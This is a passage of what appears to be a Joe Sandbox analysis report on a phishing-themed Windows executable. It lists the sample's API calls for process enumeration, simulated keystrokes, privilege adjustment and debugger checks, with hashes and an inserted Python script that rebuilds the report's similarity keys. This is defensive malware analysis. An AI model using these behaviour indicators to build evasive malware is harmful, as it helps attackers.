• Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
Similarity
• API ID: Window$EnabledForegroundIconicVisibleZoomed
• String ID:
• API String ID: 292994002-0
• Opcode ID: fa1c510c92f71a44183b1f8e5f98e4bbb2f1496c268848bb3d90c1e27a7b90f3
• Instruction ID: d7b476685c5036323670efa49097e54a96110d3657607d406b4f57230eb82c94
• Instruction Fuzzy Hash: DB21D3317406119FDB218F1AC848B6A7BA5FF95315F1E9059E846CB352CBB1DC42CB90
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                                                                          • API String ID: 0-1546025612
                                                                                          • Opcode ID: 197ec7f99e5b1b797b22c70d3cdc9baff3613a66090e434043ec4e380ec29589
                                                                                          • Instruction ID: d409fa4a79257bdfecf4136f0143f8ed5c999219fa8d34c4f6b321a029d7b4e1
                                                                                          • Opcode Fuzzy Hash: 197ec7f99e5b1b797b22c70d3cdc9baff3613a66090e434043ec4e380ec29589
                                                                                          • Instruction Fuzzy Hash: 0EA25870A0061ACBDF64CF58C8407EEB7B5FF54310F2481AAE859A7385EB789D91CB91
                                                                                          APIs
                                                                                          • CreateToolhelp32Snapshot.KERNEL32 ref: 0085A6AC
                                                                                          • Process32FirstW.KERNEL32(00000000,?), ref: 0085A6BA
                                                                                            • Part of subcall function 007D9CB3: _wcslen.LIBCMT ref: 007D9CBD
                                                                                          • Process32NextW.KERNEL32(00000000,?), ref: 0085A79C
                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0085A7AB
                                                                                            • Part of subcall function 007ECE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00813303,?), ref: 007ECE8A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                                                                                          • String ID:
                                                                                          • API String ID: 1991900642-0
                                                                                          • Opcode ID: 690d3c45b6119281710e09973d1d178c355483ec122e0d1b1becffb2b238cfb4
                                                                                          • Instruction ID: ec0196fc160b5efc5a98d68b565118446e13228d187ddfddd41e23352c7f7aaf
                                                                                          • Opcode Fuzzy Hash: 690d3c45b6119281710e09973d1d178c355483ec122e0d1b1becffb2b238cfb4
                                                                                          • Instruction Fuzzy Hash: 07513971508340AFD314EF25C886A6BBBF8FF89754F00491EF98597291EB74E904CB92
                                                                                          APIs
                                                                                          • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 0083AAAC
                                                                                          • SetKeyboardState.USER32(00000080), ref: 0083AAC8
                                                                                          • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 0083AB36
                                                                                          • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 0083AB88
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: KeyboardState$InputMessagePostSend
                                                                                          • String ID:
                                                                                          • API String ID: 432972143-0
                                                                                          • Opcode ID: c1289621ef6fc8113d81879dd83dc121cbc19f26e1caf4e89d24fb9a0006d99e
                                                                                          • Instruction ID: 1c4dd50867b670278d92aee27b406b60f581e98524990bf9f8bdccb7228a09e0
                                                                                          • Opcode Fuzzy Hash: c1289621ef6fc8113d81879dd83dc121cbc19f26e1caf4e89d24fb9a0006d99e
                                                                                          • Instruction Fuzzy Hash: 9F31F731A40248AEEF298A64CC05BFAB7A6FBD4320F04421AE1C1D61D1D3758981C7E3
                                                                                          APIs
                                                                                          • _free.LIBCMT ref: 0080BB7F
                                                                                            • Part of subcall function 008029C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0080D7D1,00000000,00000000,00000000,00000000,?,0080D7F8,00000000,00000007,00000000,?,0080DBF5,00000000), ref: 008029DE
                                                                                            • Part of subcall function 008029C8: GetLastError.KERNEL32(00000000,?,0080D7D1,00000000,00000000,00000000,00000000,?,0080D7F8,00000000,00000007,00000000,?,0080DBF5,00000000,00000000), ref: 008029F0
                                                                                          • GetTimeZoneInformation.KERNEL32 ref: 0080BB91
                                                                                          • WideCharToMultiByte.KERNEL32(00000000,?,008A121C,000000FF,?,0000003F,?,?), ref: 0080BC09
                                                                                          • WideCharToMultiByte.KERNEL32(00000000,?,008A1270,000000FF,?,0000003F,?,?,?,008A121C,000000FF,?,0000003F,?,?), ref: 0080BC36
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: ByteCharMultiWide$ErrorFreeHeapInformationLastTimeZone_free
                                                                                          • String ID:
                                                                                          • API String ID: 806657224-0
                                                                                          • Opcode ID: d7e83fab3492b721eb20f96c944ae07fd5165e203aa77770b94b96a707cd241f
                                                                                          • Instruction ID: 925127baeb7b1a86cf7a00e3e7dee877dd16a151ba870cea5b9ebd4b0412efde
                                                                                          • Opcode Fuzzy Hash: d7e83fab3492b721eb20f96c944ae07fd5165e203aa77770b94b96a707cd241f
                                                                                          • Instruction Fuzzy Hash: BC31DE71904245DFEB50DFA8CC80A79BBB8FF56760B1546AAE060DB6E1D7309E40CB50
                                                                                          APIs
                                                                                          • InternetReadFile.WININET(?,?,00000400,?), ref: 0084CE89
                                                                                          • GetLastError.KERNEL32(?,00000000), ref: 0084CEEA
                                                                                          • SetEvent.KERNEL32(?,?,00000000), ref: 0084CEFE
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorEventFileInternetLastRead
                                                                                          • String ID:
                                                                                          • API String ID: 234945975-0
                                                                                          • Opcode ID: 09613549167c877435786894739655993964d7a84896adeffc839c135edca722
                                                                                          • Instruction ID: d13f615fe9dd71af066f9f936798a4cb40ead43079b49d0ec08ed99b0437674c
                                                                                          • Opcode Fuzzy Hash: 09613549167c877435786894739655993964d7a84896adeffc839c135edca722
                                                                                          • Instruction Fuzzy Hash: EB219DB1501309DBDB60DFA5C948BA67BFCFB50358F10442EE646D2251EBB8EE088B64
                                                                                          APIs
                                                                                          • lstrlenW.KERNEL32(?,00815222), ref: 0083DBCE
                                                                                          • GetFileAttributesW.KERNEL32(?), ref: 0083DBDD
                                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 0083DBEE
                                                                                          • FindClose.KERNEL32(00000000), ref: 0083DBFA
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: FileFind$AttributesCloseFirstlstrlen
                                                                                          • String ID:
                                                                                          • API String ID: 2695905019-0
                                                                                          • Opcode ID: 7672076da8f277fc62cb8c6bceba95732052c8c7df1b80b1062385e9ac4c5d77
                                                                                          • Instruction ID: 6cc1cdc8f9ab526b69dd2bd3342de2da68d6266c416b5989cf4d133a0acbe677
                                                                                          • Opcode Fuzzy Hash: 7672076da8f277fc62cb8c6bceba95732052c8c7df1b80b1062385e9ac4c5d77
                                                                                          • Instruction Fuzzy Hash: CAF0A070820A145782206B78AC0D8BA776CFF82334F106702F8B6C22E0EBF0995686D5
                                                                                          APIs
                                                                                          • lstrlenW.KERNEL32(?,?,?,00000000), ref: 008382AA
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: lstrlen
                                                                                          • String ID: ($|
                                                                                          • API String ID: 1659193697-1631851259
                                                                                          • Opcode ID: 1411371e751f673ccf1b52182ac95e6361ccd82be271cf1854ef6091b0c073c8
                                                                                          • Instruction ID: 64c966326a44e0079280fccdb932b3a572c3da6d10bf57cec72b1dad5ba512d3
                                                                                          • Opcode Fuzzy Hash: 1411371e751f673ccf1b52182ac95e6361ccd82be271cf1854ef6091b0c073c8
                                                                                          • Instruction Fuzzy Hash: 2D322474A00705DFCB28CF59C481A6AB7F1FF88710B15856EE49ADB7A1EB70E941CB80
                                                                                          APIs
                                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 00845CC1
                                                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 00845D17
                                                                                          • FindClose.KERNEL32(?), ref: 00845D5F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Find$File$CloseFirstNext
                                                                                          • String ID:
                                                                                          • API String ID: 3541575487-0
                                                                                          • Opcode ID: 4754485e26c51aeb89732aea945e76b312739609f01e05a676dea7464bccd9cd
                                                                                          • Instruction ID: b9c2d6032b809a8e616c88f3b18d6dbe58550f374d975ec3ebb6f8c0026b76e9
                                                                                          • Opcode Fuzzy Hash: 4754485e26c51aeb89732aea945e76b312739609f01e05a676dea7464bccd9cd
                                                                                          • Instruction Fuzzy Hash: B351AA74A04A05DFC714DF28C498A9AB7E4FF49314F14856EE99ACB3A2DB34ED04CB91
                                                                                          APIs
                                                                                          • IsDebuggerPresent.KERNEL32 ref: 0080271A
                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00802724
                                                                                          • UnhandledExceptionFilter.KERNEL32(?), ref: 00802731
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                          • String ID:
                                                                                          • API String ID: 3906539128-0
                                                                                          • Opcode ID: 32fe3c9c3b58d90935250429582a91193bf055638e3b9bf807ad768213ce3228
                                                                                          • Instruction ID: eb77e74e7a962f30dde7360b37ceb807e1fed58abaa9952aaf2971939729646c
                                                                                          • Opcode Fuzzy Hash: 32fe3c9c3b58d90935250429582a91193bf055638e3b9bf807ad768213ce3228
                                                                                          • Instruction Fuzzy Hash: C631C27591121CABCB21DF68DD88798BBB8BF08310F5041EAE91CA63A1E7749F818F44
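                                                                                          The API ID printed under Similarity in each block above is a compact key derived from the function's API calls, and it is what lets one function be matched against the same routine in other dumps or other samples. The following added example is not part of the Joe Sandbox report and is not Joe Sandbox's published algorithm; it reconstructs the key from an "APIs" list using rules inferred from the blocks on this page and checked against them: subcall APIs are included, the A/W charset suffix is dropped, CamelCase names are split into words, a set of generic prefixes (assumed to be Get, Set, Is, To and Rtl) is discarded, and the remaining words are grouped by frequency, most frequent group first, joined with "$", and sorted by code point within each group. The sample input is copied from this page's own blocks.

```python
"""Reconstruct the Joe Sandbox 'API ID' similarity key from a function's API list.

Added example: not part of the report, and not Joe Sandbox's published algorithm.
Every rule below was inferred from the blocks on this page; STOP_TOKENS and the
suffix rule in particular are assumptions that happen to reproduce those blocks.
"""
import re
from collections import Counter

# Assumption inferred from this page: generic prefixes that never appear in any
# API ID here, e.g. Get/Set/Is (GetLastError, SetEvent, IsDebuggerPresent),
# "To" (WideCharToMultiByte) and "Rtl" (RtlFreeHeap).
STOP_TOKENS = {"Get", "Set", "Is", "To", "Rtl"}

# One report line: "• Name.MODULE(args), ref: ..." or an indented
# "• Part of subcall function XXXX: Name.MODULE ...". Subcalls count too.
API_LINE = re.compile(
    r"•\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?([A-Za-z_]\w*)\.(\w+)"
)

# CamelCase words keep their digits (Toolhelp32); C-runtime names (_wcslen,
# lstrlen) stay whole. Runs of capitals such as "URL" are not on this page and
# would be split letter by letter; treat that as an untested case.
TOKEN = re.compile(r"[A-Z][a-z0-9]*|[a-z_][a-z0-9_]*")


def parse_api_names(block: str) -> list[str]:
    """Return API names from a report 'APIs' block, in the order listed."""
    return [m.group(1) for m in map(API_LINE.search, block.splitlines()) if m]


def strip_charset_suffix(name: str) -> str:
    """Drop the ANSI/Unicode suffix: Process32FirstW -> Process32First."""
    if len(name) > 1 and name[-1] in "AW" and (name[-2].islower() or name[-2].isdigit()):
        return name[:-1]
    return name


def tokenize(name: str) -> list[str]:
    """Split one API name into the words the ID is built from."""
    return [t for t in TOKEN.findall(strip_charset_suffix(name)) if t not in STOP_TOKENS]


def api_id(names: list[str]) -> str:
    """Group words by frequency (highest first), '$'-separated; code-point order
    inside a group, which puts '_wcslen' after 'Toolhelp32' and 'lstrlen' after
    'First' exactly as the report does."""
    counts = Counter(t for n in names for t in tokenize(n))
    groups: dict[int, list[str]] = {}
    for tok, c in counts.items():
        groups.setdefault(c, []).append(tok)
    return "$".join("".join(sorted(groups[c])) for c in sorted(groups, reverse=True))


# Constructed input: API lines copied from four blocks of this report, each
# paired with the API ID the report prints for that block.
SAMPLES = [
    ("""• CreateToolhelp32Snapshot.KERNEL32 ref: 0085A6AC
• Process32FirstW.KERNEL32(00000000,?), ref: 0085A6BA
  • Part of subcall function 007D9CB3: _wcslen.LIBCMT ref: 007D9CBD
• Process32NextW.KERNEL32(00000000,?), ref: 0085A79C
• CloseHandle.KERNEL32(00000000), ref: 0085A7AB
  • Part of subcall function 007ECE60: CompareStringW.KERNEL32(00000409,00000001,?), ref: 007ECE8A""",
     "Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen"),
    ("""• _free.LIBCMT ref: 0080BB7F
  • Part of subcall function 008029C8: RtlFreeHeap.NTDLL(00000000,00000000,?), ref: 008029DE
  • Part of subcall function 008029C8: GetLastError.KERNEL32(00000000,?), ref: 008029F0
• GetTimeZoneInformation.KERNEL32 ref: 0080BB91
• WideCharToMultiByte.KERNEL32(00000000,?,008A121C,000000FF,?,0000003F,?,?), ref: 0080BC09
• WideCharToMultiByte.KERNEL32(00000000,?,008A1270,000000FF,?,0000003F,?,?), ref: 0080BC36""",
     "ByteCharMultiWide$ErrorFreeHeapInformationLastTimeZone_free"),
    ("""• FindFirstFileW.KERNEL32(?,?), ref: 00845CC1
• FindNextFileW.KERNEL32(00000000,?), ref: 00845D17
• FindClose.KERNEL32(?), ref: 00845D5F""",
     "Find$File$CloseFirstNext"),
    ("""• IsDebuggerPresent.KERNEL32 ref: 0080271A
• SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00802724
• UnhandledExceptionFilter.KERNEL32(?), ref: 00802731""",
     "ExceptionFilterUnhandled$DebuggerPresent"),
]


def check_samples() -> dict[str, bool]:
    """Map each expected API ID from the page to whether we reproduce it."""
    return {want: api_id(parse_api_names(block)) == want for block, want in SAMPLES}


if __name__ == "__main__":
    for want, ok in check_samples().items():
        print("OK  " if ok else "FAIL", want)
```

                                                                                          Reconstructing the key shows what it does and does not capture: it is a bag of words over the imported API names, so call order, arguments and the code between calls do not affect it, while a single extra subcall (the _wcslen in the Process32 block) does. For triage that makes it a cheap first filter: a function whose API ID matches one seen in a known runtime routine (the head of this report flags the sample as a compiled AutoIt script, and the Toolhelp32, SendInput and FindFirstFile blocks above are the kind of routine that runtime ships) can be set aside, and the instruction fuzzy hash, not the API ID, is what should decide whether two blocks with the same key are the same code. The STOP_TOKENS set and the suffix rule are verified only against the blocks on this page.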
                                                                                          APIs
                                                                                          • SetErrorMode.KERNEL32(00000001), ref: 008451DA
                                                                                          • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00845238
                                                                                          • SetErrorMode.KERNEL32(00000000), ref: 008452A1
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID: ErrorMode$DiskFreeSpace
                                                                                          • String ID:
                                                                                          APIs
                                                                                            • Part of subcall function 007EFDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 007F0668
                                                                                            • Part of subcall function 007EFDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 007F0685
                                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0083170D
                                                                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0083173A
                                                                                          • GetLastError.KERNEL32 ref: 0083174A
                                                                                          Similarity
                                                                                          • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                                                                                          • String ID:
                                                                                          APIs
                                                                                          • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0083D608
                                                                                          • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 0083D645
                                                                                          • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0083D650
                                                                                          Similarity
                                                                                          • API ID: CloseControlCreateDeviceFileHandle
                                                                                          • String ID:
                                                                                          APIs
                                                                                          • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0083168C
                                                                                          • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 008316A1
                                                                                          • FreeSid.ADVAPI32(?), ref: 008316B1
                                                                                          Similarity
                                                                                          • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                          • String ID:
                                                                                          APIs
                                                                                          • GetCurrentProcess.KERNEL32(008028E9,?,007F4CBE,008028E9,008988B8,0000000C,007F4E15,008028E9,00000002,00000000,?,008028E9), ref: 007F4D09
                                                                                          • TerminateProcess.KERNEL32(00000000,?,007F4CBE,008028E9,008988B8,0000000C,007F4E15,008028E9,00000002,00000000,?,008028E9), ref: 007F4D10
                                                                                          • ExitProcess.KERNEL32 ref: 007F4D22
                                                                                          Similarity
                                                                                          • API ID: Process$CurrentExitTerminate
                                                                                          • String ID:
                                                                                          APIs
                                                                                          • GetUserNameW.ADVAPI32(?,?), ref: 0082D28C
                                                                                          Similarity
                                                                                          • API ID: NameUser
                                                                                          • String ID: X64
                                                                                          APIs
                                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 00846918
                                                                                          • FindClose.KERNEL32(00000000), ref: 00846961
                                                                                          Similarity
                                                                                          • API ID: Find$CloseFileFirst
                                                                                          • String ID:
                                                                                          APIs
                                                                                          • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00854891,?,?,00000035,?), ref: 008437E4
                                                                                          • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00854891,?,?,00000035,?), ref: 008437F4
                                                                                          Similarity
                                                                                          • API ID: ErrorFormatLastMessage
                                                                                          • String ID:
                                                                                          APIs
                                                                                          • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 0083B25D
                                                                                          • keybd_event.USER32(?,75C0C0D0,?,00000000), ref: 0083B270
                                                                                          Similarity
                                                                                          • API ID: InputSendkeybd_event
                                                                                          • String ID:
                                                                                          APIs
                                                                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,008311FC), ref: 008310D4
                                                                                          • CloseHandle.KERNEL32(?,?,008311FC), ref: 008310E9
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: AdjustCloseHandlePrivilegesToken
                                                                                          • String ID:
                                                                                          • API String ID: 81990902-0
                                                                                          • Opcode ID: 44b965e9d51673e071389436954de63f15847308f4e6c67527d5969c081ccb70
                                                                                          • Instruction ID: 3723526dc2457bac53327ef882c8903e9a6669d36a3955773ef12848303a072f
                                                                                          • Opcode Fuzzy Hash: 44b965e9d51673e071389436954de63f15847308f4e6c67527d5969c081ccb70
                                                                                          • Instruction Fuzzy Hash: 17E04F32008A40EEE7252B12FC09E777BA9FB04310F10882DF4A5804B1DBA26C90DB50
                                                                                          Strings
                                                                                          • Variable is not of type 'Object'., xrefs: 00820C40
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: Variable is not of type 'Object'.
                                                                                          • API String ID: 0-1840281001
                                                                                          • Opcode ID: 66027bfa65427d2a0d3f1085939bde03b4cbc6d066b17e2ee33885b535212c1c
                                                                                          • Instruction ID: 346c4c7627eaa668118f1021e46ef999e769af1139091658fefa11c13f56de19
                                                                                          • Opcode Fuzzy Hash: 66027bfa65427d2a0d3f1085939bde03b4cbc6d066b17e2ee33885b535212c1c
                                                                                          • Instruction Fuzzy Hash: D832AC74900229DBCF15DF94D985AEDB7B5FF05304F24405AE806AB392CB79AE85CF60
                                                                                          APIs
                                                                                          • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00806766,?,?,00000008,?,?,0080FEFE,00000000), ref: 00806998
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
